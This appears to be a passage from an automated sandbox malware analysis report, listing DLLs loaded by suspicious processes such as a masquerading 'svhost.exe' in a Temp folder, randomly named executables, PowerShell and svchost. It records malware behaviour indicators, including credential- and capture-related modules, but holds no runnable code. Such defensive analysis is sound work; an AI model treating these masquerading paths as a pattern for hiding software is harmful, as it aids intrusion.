                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: linkinfo.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: avicap32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: msvfw32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: winmm.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: powrprof.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: umpdc.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: mswsock.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: userenv.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: profapi.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: netapi32.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: wkscli.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: netutils.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: samcli.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: samlib.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: kernel.appcore.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: uxtheme.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: wbemcomn.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: sxs.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: amsi.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: version.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: wbemcomn.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: wbemcomn.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: wbemcomn.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: wtsapi32.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: winsta.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: dpapi.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: cryptbase.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: rstrtmgr.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: ncrypt.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: winmm.dll
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: powrprof.dll
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeSection loaded: umpdc.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: winmm.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: powrprof.dll
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
